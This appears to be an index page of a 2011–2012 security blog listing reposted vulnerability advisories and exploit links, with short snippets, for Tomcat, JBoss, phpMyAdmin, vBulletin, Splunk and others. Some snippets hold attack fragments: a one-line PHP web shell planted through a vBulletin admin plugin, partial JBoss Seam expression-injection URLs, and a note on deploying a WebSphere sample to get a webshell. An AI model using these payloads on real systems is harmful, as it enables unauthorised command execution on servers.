Repost: Cacti Multiple Input Validation Security Vulnerabilities
http://www.securityfocus.com/bid/39639/exploit
2012-01-16 10:45:17
599
Repost: Citrix Provisioning Services 'streamprocess.exe' Component Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/45914/exploit
2012-01-16 10:30:30
755
Repost: Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html
2012-01-16 10:26:17
1007
Repost: op5 Appliance Multiple Remote Command Execution Vulnerabilities
http://www.securityfocus.com/bid/51212/exploit
2012-01-16 10:19:37
567
Repost: Apache Tomcat information disclosure vulnerability
CVE-2010-1157: Apache Tomcat information disclosure vulnerability. Severity: Low. Vendor: The Apache Software Foundation. Versions Affected: Tomcat 6.0.0 to 6.0.26, Tomcat 5.5.0 to 5.5.
2012-01-16 10:15:58
1104
Repost: tomcat RequestDispatcher directory traversal vulnerability
CVE-2008-5515: Apache Tomcat information disclosure vulnerability. Severity: Important. Vendor: The Apache Software Foundation. Versions Affected: Tomcat 4.1.0 to 4.1.39, Tomcat 5.5.0 to 5.5.2
2012-01-16 10:07:19
900
Repost: JBoss Cache NonManagedConnectionFactory will log the password in clear text when an exception occurs
http://anonsvn.jboss.org/repos/jbosscache/core/trunk/src/main/java/org/jboss/cache/loader/NonManagedConnectionFactory.java 088 public Connection getConnection() 089 { ...... 099 catch (SQLExceptio
2012-01-16 09:49:23
727
Repost: CVE-2011-4107 PoC - phpMyAdmin Local File Inclusion via XXE injection
CVE-2011-4107 PoC - phpMyAdmin Local File Inclusion via XXE injection. An interesting local file inclusion vulnerability has been recently published. An XXE (XML eXternal Entity) injection attack, whi
2012-01-15 17:41:55
1187
Repost: Installing Arachni on Backtrack5
apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev 2. Install arachni: gem install arachni 3. Run the web interface: arachni_web_autostart Reference: https://github.com/Zapotek/arachni/
2012-01-11 11:24:34
2372
1
Original: Arachni – Web Application Vulnerability Scanning Framework
https://github.com/Zapotek/arachni/downloads
2012-01-11 11:19:49
766
Original: sqlmap video
http://www.youtube.com/watch?v=SG7V5acSgIY http://www.youtube.com/watch?NR=1&feature=endscreen&v=NFmAdluw4GI
2012-01-10 09:51:22
580
Repost: Oracle GlassFish Server Administration Bypass
http://packetstormsecurity.org/files/108381/NGS00106.txt
2012-01-06 10:11:32
668
Repost: bypassing waf's in sql injection
http://packetstorm.wowhacker.com/papers/attack/bypass-waf.txt
2012-01-05 10:03:55
678
Repost: Beyond SQLi: Obfuscate and Bypass
http://packetstorm.wowhacker.com/papers/attack/beyond-sqli.txt
2012-01-05 09:30:39
643
Repost: Time-Based Blind NoSQL Injection
http://packetstorm.wowhacker.com/papers/general/timebased-nosql.txt Time-Based Blind NoSQL Injection - Detecting server-side JavaScript injection vulnerabilities. In July 2011, Bryan Sullivan, a
2012-01-05 09:25:22
864
Repost: Time-Based Blind NoSQL Injection
Time-Based Blind NoSQL Injection - Detecting server-side JavaScript injection vulnerabilities. In July 2011, Bryan Sullivan, a senior security researcher at Adobe Systems, demonstrated server-si
2012-01-05 09:24:59
1048
Repost: Cold Fusion Hacking
http://www.blackhatacademy.org/security101/index.php?title=Cold_Fusion_Hacking
2012-01-04 14:25:39
871
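Repost: Cross-Site Scripting (XSS): The Never-Ending Filtering Nightmare, Now with a New Attack Syntax!
Cross-site scripting (Cross Site Scripting, abbreviated XSS, also translated as cross-site intrusion string) has a new attack syntax! This time, triggering the malicious script requires neither the script tag (e.g. alert(1)) nor the javascript protocol (e.g. javascript:alert(1)); instead, what was disclosed on August 26 is a tag that has existed for a long time but is rarely used, whose function is similar to , , , and , all of which accept user input. onerror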
2012-01-04 09:55:34
1055
Repost: web service hacking
http://www.soapui.org/SOAP-and-WSDL/web-service-hacking.html
2011-12-31 10:45:10
851
Repost: Executing arbitrary code on websphere
/wssamplemtom/demo deploy it to obtain a webshell /snoop www.exploit-db.com/download_pdf/12935/
2011-12-30 14:22:59
852
Repost: Using CURL to exploit LFI to RCE from command line
http://www.youtube.com/watch?v=kf5kZIKtSO0&feature=player_embedded
2011-12-30 11:08:15
1388
Repost: IBM Lotus Domino Authentication Bypass
# Exploit Title: IBM Lotus Domino Controller auth. bypass # Date: 30/11/2011 # Author: Alexey Sintsov # Software Link: http://www.ibm.com/ # Version: 8.5.3/8.5.2 FP3 (0day) # Tested on: Windows 7
2011-12-30 09:44:07
1513
Repost: Privilege escalation vulnerabilities in Nagios XI installer
================ Privilege escalation vulnerabilities in Nagios XI installer < 2011R1.9 Author: 0a29406d9794e4f9b30b3c5d6702c708 twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940 ===========
2011-12-30 09:40:46
1580
Repost: Citrix XenDesktop, XenServer, Receiver 5.6 SP2 Pass-The-Hash
Tested against: Citrix XenDesktop, XenServer, Receiver 5.6 SP2 (possibly other versions as well). By default, the authentication between the Citrix Receiver client to the Web interface is not config
2011-12-30 09:39:08
1734
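Repost: Installing the xfce desktop + vncserver for remote management on CentOS
Cheap VPSes are everywhere now, and some get bought and barely used; rather than leave them idle, you might as well put them to work. They can be managed over ssh, but a graphical desktop lets you do more, such as running eMule, BT and the like. First install a desktop environment; I chose xfce, a lightweight desktop that is small, practical and light on memory. Install it with the following command: yum groupinstall xfce-4.4 Once the desktop is installed, the next step is vncserver; install it with the following command: yum install vnc vnc-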
2011-12-29 17:47:59
2113
Repost: Splunk Remote Root Exploit
http://www.exploit-db.com/exploits/18245/ from sec1httplib.requestbuilder import Requestobj from sec1httplib.thread_dispatcher import * import thr
2011-12-21 08:47:51
2333
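Repost: A Case Study: High-Performance, High-Concurrency Website Architecture for Tens of Millions of PVs
A Case Study: High-Performance, High-Concurrency Website Architecture for Tens of Millions of PVs http://blog.liuts.com/post/234/ At the invitation of the CU administrators, I joined the discussion thread "Architecture and design of high-performance, high-concurrency websites with tens of millions of PVs" and posted a case study to share with everyone. A website serving tens of millions of PVs is a real test of whether an architecture is mature and robust (this article does not cover the software architecture layer; that can be discussed too if there is interest). Here is a system-level architecture; it is not guaranteed to be the optimal solution, but it may suit you. Reasons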
2011-12-20 10:17:25
4045
Repost: vBulletin forum, all versions: getting a shell from the admin panel
In the admin panel, go to plugin management. Add a plugin. Ajax_complete, enter the code: if(isset($_GET['cmd'])){echo "cmd"; system($_GET['cmd']);exit;} Activate the mod and visit www.site.com/foruml
2011-12-20 10:16:49
1912
Original: Security-related standards: secure coding
http://www.cert.org/secure-coding/scstandards.html http://cwe.mitre.org/top25/index.html
2011-12-20 10:11:16
998
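Repost: Exporting user data from Exchange
First, the administrative user must be granted elevated permissions; the procedure is described in another article, or see http://technet.microsoft.com/zh-cn/library/bb266964(EXCHG.80).aspx Steps for exporting mailbox data with the Exchange Management Shell in Exchange 2007 SP1: to export a mailbox's special folders and empty folders to a folder in the target mailbox, run the following command: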
2011-12-16 14:43:48
5235
Repost: Monitoring Cisco ASA and IPS via NAGIOS
Below are the configuration steps for monitoring Cisco ASA or IPS appliances via Nagios. The file commands.cfg must be adjusted. The corresponding scripts, from the NAGIOS community, ch
2011-12-16 11:05:07
1228
Repost: JBoss Seam remote execution vulnerability: exploitation steps
Target: http://www.ip.com http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478 http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName('j
2011-12-15 10:59:01
2778
Repost: JBoss Seam Framework remote code execution
Here's an interesting bug I found in JBoss Seam Framework, which led to remote code execution using JBoss EL expressions. Having any sort of custom expression language in a web framework is always a sign
2011-12-15 10:32:07
1946
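Original: Lotus Domino: finding which emails a user has viewed
Longrun/ZGYH/BJ() 9:29:32 It seems this has to be done through log analysis, then looking up the mail's UNID in the log analysis to determine which emails the user has viewed; a bit complicated... Longrun/ZGYH/BJ() 9:30:15 And it's analysis of the local loga4.nsf, which will grind the PC to a halt...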
2011-12-14 09:50:04
1198
Repost: Configuration Management under FreeBSD with Cfengine 3.
http://unix-heaven.org/node/50 http://blog.zzamboni.org/editing-sshd-configuration-files-with-cfengin
2011-12-11 21:40:45
806
Original: Citrix Chinese documentation center
http://support.citrix.com/proddocs/topic/xenapp/nl/zh/cn/xenapp65-w2k8-wrapper.html?locale=cn
2011-12-06 10:27:51
1490